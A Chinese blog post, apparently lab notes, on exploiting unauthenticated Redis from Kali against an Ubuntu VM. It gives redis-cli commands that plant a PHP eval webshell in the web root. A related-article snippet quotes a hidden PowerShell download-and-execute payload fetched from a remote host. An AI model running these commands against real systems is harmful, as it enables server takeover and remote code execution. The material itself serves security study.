Redis未授权访问的利用方式(ubuntu

最新推荐文章于 2024-05-29 13:35:26 发布
最新推荐文章于 2024-05-29 13:35:26 发布
阅读量530 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44843084/article/details/106605502
版权

Redis未授权访问的利用方式(ubuntu

安装

ubuntu

https://blog.csdn.net/hzlarm/article/details/99432240

sudo apt-get install redis-server

sudo vi /etc/redis/redis.conf

#bind 127.0.0.1

propected-mode no

重启sudo srevice redis restart

kali
https://www.cnblogs.com/littlemood/p/11795761.html

kali攻击ubuntu

未授权访问漏洞

https://www.cnblogs.com/ECJTUACM-873284962/p/9561993.html

https://www.cnblogs.com/yuzly/p/11663822.html

产生条件:

(1)Redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;

(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。

ubuntu:192.168.79.129

kali:192.168.79.128

  1. 通过redis-cli与Redis服务端进行连接,通过Redis未授权直接连接Redis服务端

    kali

redis-cli -h 192.168.79.129

可以连接
在这里插入图片描述

使用config get dir命令得到redis备份的路径
在这里插入图片描述

(error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error. (5.12s)
在这里插入图片描述

config set stop-writes-on-bgsave-error no

save一直失败。。。

set 1 '<?php eval($_GET["a"]);?>'
config set dir /var/www/html
config set dbfilename shell.php
save

在这里插入图片描述

霜桃
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
Redis授权四种利用方式与修复方案
qq_45234543的博客
11-08 5110
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
Linux下常用的优秀软件
bleedingfight的博客
03-07 2万+
Linux好用软件介绍常用软件图像 常用软件 。 图像 gscan2pdf:将扫描仪扫描的图像生成联合的pdf 安装:sudo apt-get install gscan2pdf pinta:图像编辑工具。
windows环境redis授权利用手法总结
2401_84466336的博客
05-29 1262
redis 目标ip:6379>set x "/r/n/r/npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://csip:80/a'))\"/r/n/r/n。也就是说在`c:/windows/system32/wbem/mof/`目录下的mof文件会每5秒自动执行一次,这样就不需要重启机器就能获取权限了。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
在Linux操作系统中,下载并安装软件
m0_59276103的博客
06-02 3998
Linux操作系统中下载并安装软件,并使用该软件进行编程。
redis授权访问利用方式
Redredredfish的博客
08-23 1506
redis授权访问利用方式 漏洞原理: Redis<3.2默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的安全策略,比如添加防火墙黑白名单等等,这样会将Redis服务暴露在公网上。 如果在没有设置密码(默认为空)的情况下,会导致任意用户可以授权访问Redis以及读取Redis的数据。攻击者利用Redis自身的提供的config命令,可以进行写文件操作,还可以将ssh公钥写入目标服务器./root/.ssh下的authotrized_keys 文件中,进而可以利用对应私钥直接使
linux之linux下载软件包
Lxn2zh的博客
08-05 3596
我在使用系统自带的yum源文件时发现无法访问那些网站,所以去找了个搜狐的镜像源,将原本的baseurl的前半部分换为http://mirrors.sohu.com/该命令的作用是调用gcc编译器,读取上述Makefile文件中的信息进行系统软件编译,编译是为了把源码程序转换成linux可执行的文件。yum的源配置文件保存在/etc/yum.repos.d文件夹中,默认使用的是CentOS-Base.repo。用于带 HP Alpha CPU 的计算机,最初是 DEC 公司开发的。......
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
(笔记自用)在Linux中下载、安装离线的软件包
qq_56621128的博客
09-14 2179
学习如何下载rpm的软件包,以及其依赖关系。之前在操作的时候只下载了rpm软件包,没有下载其依赖关系导致一直下载失败。后来找到问题,特作学习笔记一篇
常用 Linux 软件汇总,足够用了!,带你玩转自定义view系列
weixin_57992300的博客
04-06 905
HexChat 是一款基于 XChat 的 IRC 客户端,但和 XChat 不一样的是它对 Windows 和 Unix-like 系统都是完全自由的。它的开发是为了成为一个小型又快速的 IDE,对其它包仅有不多的依赖。- 大量社区创建的图标,shell 主题,字体,以及其他更多的可用来个性化你的 Gnome 桌面环境的资源,都在这一个站点。- Desura 是一个社区驱动的游戏玩家数字分发服务,将来自开发者的最好的游戏,模组,以及可下载内容放在玩家的指尖,随时可以购买和游玩。
Linux常用软件安装
08-27
在Linux安装常用软件 jdk mysql tomcat redis在Linux安装常用软件 jdk mysql tomcat redis
【Linux】软件安装(三分钟教会你如何在linux下安装软件)
Lin5200000的博客
02-13 1万+
Linux下软件的安装
Linux如何下载安装软件超详细解析
热门推荐
文文的博客
09-05 5万+
网上很多Linux下载软件的方法,看了很多帖子感觉Linux下载软件的方式有很多,每个人都有自己的习惯,对于一个新手来说及其不友好,有时候会看的很蒙。在这里做出总结。
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1876
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
linux下载软件包
Lxn2zh的博客
08-05 595
yum的源配置文件保存在/etc/yum.repos.d文件夹中,默认使用的是CentOS-Base.repo,yum是Redhat所特有的安装RPM程序包的工具,在使用RPM安装某一个程序包时可能会因为该程序包依赖另一个程序包而无法安装,yum可以连同依赖的程序包一起安装。二进制包(rpm) centos下 (除了rpm还有srpm,srpm 包为编译过的 rpm 包,需要以 rpm 管理的方式编译,然后以 rpm 的安装方式安装)源代码 RPM 包的结尾通常是.src.rpm。
Redis授权访问漏洞利用总结
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
海量的超赞 Linux 软件
JackTian
01-20 2161
来源:rrd.me/fDvEd 这个仓库收集了对任何用户/开发者都超赞的 Linux 应用软件。 请随意 contribute / star / fork / pull request。 应用音频 Airtime - Airtime 是一款用于调度和远程站点管理的开放广播软件 Ardour - 在 Linux 上录音,编辑,和混音 Audacious - 开源音频播放器,按你想要的方式播...
linux下下载各种软件合集!!!
lzh657083979的博客
08-31 3681
下载jdk先检查当前系统中是否存在默认的jdk。 rpm -qa|grep gcj 删除查找的列出相关文件 rpm -e –nodeps + 文件名 如果没有找到,rpm -qa|grep gcj命令运行后若无文件列出则不必理会。 然后在线下载jdk1.7 wget http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-linux-x64.tar.g
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值